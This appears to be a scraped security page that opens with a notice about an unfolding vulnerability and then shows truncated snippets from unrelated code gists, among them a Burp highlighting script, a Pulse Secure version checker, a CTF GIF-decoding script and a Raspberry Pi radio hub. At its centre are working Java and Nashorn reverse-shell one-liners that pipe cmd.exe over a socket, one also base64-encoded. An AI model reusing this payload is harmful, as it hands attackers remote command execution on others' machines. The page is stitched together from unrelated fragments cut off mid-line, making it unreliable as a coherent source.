This is still a new situation. There is a lot we don't know. We don't know if there are more possible exploit paths. We only know about this one path. Please update your systems regardless.
This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
| // by @irsdl | |
| boolean manualColorHighlightEnabled = true; // e.g. BurpRed anywhere in the request | |
| boolean pwnFoxColorHighlightEnabled = true; // to support PwnFox Firefox extension containers | |
| // BEGIN HIGHLIGHT LOGIC { | |
| boolean hasAlreadyBeenColoured = false; | |
| /* Manual highlight logic to see something like BurpRed */ | |
| if(manualColorHighlightEnabled){ | |
| Pattern manualHighlightPattern = Pattern.compile("burp([a-z]{3,7}+)", Pattern.CASE_INSENSITIVE); // like burpRed or burpYellow |
| import requests | |
| import sys | |
| import re | |
| HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"} | |
| if len(sys.argv) != 2: | |
| print " Usage: python pulseversion.py <target ip/domain>" | |
| sys.exit(1) |
| from PIL import ImageSequence, Image | |
| import string, binascii, base64 | |
| colors = [] | |
| for i in range(6): | |
| im = Image.open('flag' + str(i + 1) + '.gif') | |
| colors.append([]) | |
| try: | |
| while True: |
Nashorn / Rhino:
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
| #!/usr/bin/python | |
| # raspberry pi nrf24l01 hub | |
| # more details at http://blog.riyas.org | |
| # Credits to python port of nrf24l01, Joao Paulo Barrac & maniacbugs original c library | |
| from nrf24b import NRF24 | |
| import time | |
| from time import gmtime, strftime | |
| import sys, string |
| #!/usr/bin/env python | |
| """ | |
| LICENSE http://www.apache.org/licenses/LICENSE-2.0 | |
| """ | |
| import argparse | |
| import datetime | |
| import sys | |
| import time | |
| import threading |
| import urllib2, re | |
| import urllib, os, subprocess, time, base64 | |
| opener = urllib2.build_opener() | |
| continue_loop = True | |
| while True: | |
| opener.addheaders = [('User-Agent', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0')] | |
| opener.addheaders.append(('Cookie', 'challenge_frame=1; spip_session=myspip_session; PHPSESSID=myPHPSESSID')) | |
| opener.addheaders.append(('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')) | |
| opener.addheaders.append(('Accept-Language', 'en-US,en;q=0.5')) |